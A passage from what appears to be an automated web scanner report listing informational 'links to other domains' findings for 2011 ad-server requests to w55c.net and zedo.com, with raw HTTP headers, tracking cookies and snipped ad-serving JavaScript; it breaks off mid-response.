Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; OAID=b582f801d16249d1434773906a4b7fd4; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:30:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b582f801d16249d1434773906a4b7fd4; expires=Mon, 23-Apr-2012 16:30:47 GMT; path=/
Content-Length: 4992
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
CA=1__cb=7ded26c1ac__r_id=703c247c4a32ced56d6f4012aa3ae61a__r_ts=lk60jb__oadest=http%3A%2F%2Fwww.chiquita.com%2Frio%2F%3Futm_source%3DDataXu%26utm_medium%3DBanner%26utm_campaign%3DRio' target='_blank'><img src='http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/6d3/6d3c94556afd60cca11580fea916b966.jpg' width='160' height='600' alt='' title='' border='0' /></a>
...[SNIP]...

23.118. http://d.w55c.net/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=790&cb=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0 HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; OAID=b582f801d16249d1434773906a4b7fd4; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:17:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b582f801d16249d1434773906a4b7fd4; expires=Mon, 23-Apr-2012 16:17:52 GMT; path=/
Content-Length: 5088
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
tp%3A%2F%2Fwww.hgtv.com%2Fhgtv-green-home-2011-giveaway-enter%2Fpackage%2Findex.html%3Faffiliate%3Dblocker%26omnisource%3DSEM%26c1%3DGreen_Home_Display%26c2%3DDataXu%26c3%3D160x600SWF' target='_blank'><img src='http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/062/06222ebc23c706c2ee2c929f6616dd4a.jpg' width='160' height='600' alt='' title='' border='0' /></a>
...[SNIP]...

23.119. http://d.w55c.net/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=768&cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=1afbb964a14b8098516b6fdbef7997dd; expires=Mon, 23-Apr-2012 15:19:39 GMT; path=/
Content-Length: 4729
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
e97e65b9a1__r_ts=lk5x8r__oadest=http%3A%2F%2Fwww.dallasareamazda.com%3Futm_source%3Ddataxu%26utm_medium%3Ddisplay%26utm_campaign%3DmazdaCX9%26so_utm%3D46fa0bac2e96ffe1ea882f640b8318e5' target='_blank'><img src='http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/f21/f217ad5fe4a807573e356cc4a195fc47.gif' width='728' height='90' alt='' title='' border='0' /></a>
...[SNIP]...

23.120. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.4667104624239214 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=27:25:27:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=28:27:25:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=94
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:47 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=28%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=28%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.121. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.17031772581244553 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=23:22:21:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:35 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=22:23:22:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=106
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:35 GMT
Connection: close
Content-Length: 2676

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587464/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931208%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=22%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=22%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8245264938135515 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=27:26:24:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=25:27:26:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=95
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:46 GMT
Connection: close
Content-Length: 2694

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=935452%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=25%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=25%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.9999001927744848 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=48:45:43:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1;expires=Tue, 24 May 2011 16:50:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=44:48:45:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:00 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5286815.2;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=44%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=44%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5286815.2;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=44%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=44%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6899598540329261 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=42:46:42:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:52 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=43:42:46:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:49:52 GMT
Connection: close
Content-Length: 2093

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.30;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929081%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=43%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=43%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.125. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.07817547594038587 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=15:16:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:13 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:15:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=128
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:13 GMT
Connection: close
Content-Length: 2124

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.11;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921884%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=17%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=17%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.126. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8509669981271252 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=4:2:2:None; FFCap=1574B809,210132,210841,210128|2,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732|2,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:06 GMT;path=/;domain=.zedo.com;
